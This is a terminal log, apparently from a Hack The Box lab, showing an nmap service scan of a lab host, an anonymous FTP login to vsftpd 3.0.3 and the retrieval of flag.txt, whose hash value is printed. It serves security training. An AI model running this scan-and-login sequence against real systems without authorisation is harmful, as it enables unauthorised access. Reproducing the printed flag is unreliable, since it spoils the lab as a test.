─[htb-meruneru@htb-ykzqvvjuwj]─[~]
└──╼ $nmap -sV -sC -Pn  10.129.69.179
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 13:07 UTC
Nmap scan report for 10.129.69.179
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04 02:25 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.218
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.72 seconds

┌─[htb-meruneru@htb-ykzqvvjuwj]─[~]
└──╼ $ftp  10.129.69.179
Connected to 10.129.69.179.
220 (vsFTPd 3.0.3)
Name (10.129.69.179:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get flag.txt
local: flag.txt remote: flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00 secs (24.4141 kB/s)
ftp> exit
221 Goodbye.
┌─[htb-meruneru@htb-ykzqvvjuwj]─[~]
└──╼ $cat flag.txt 
035db21c881520061c53e0536e44f815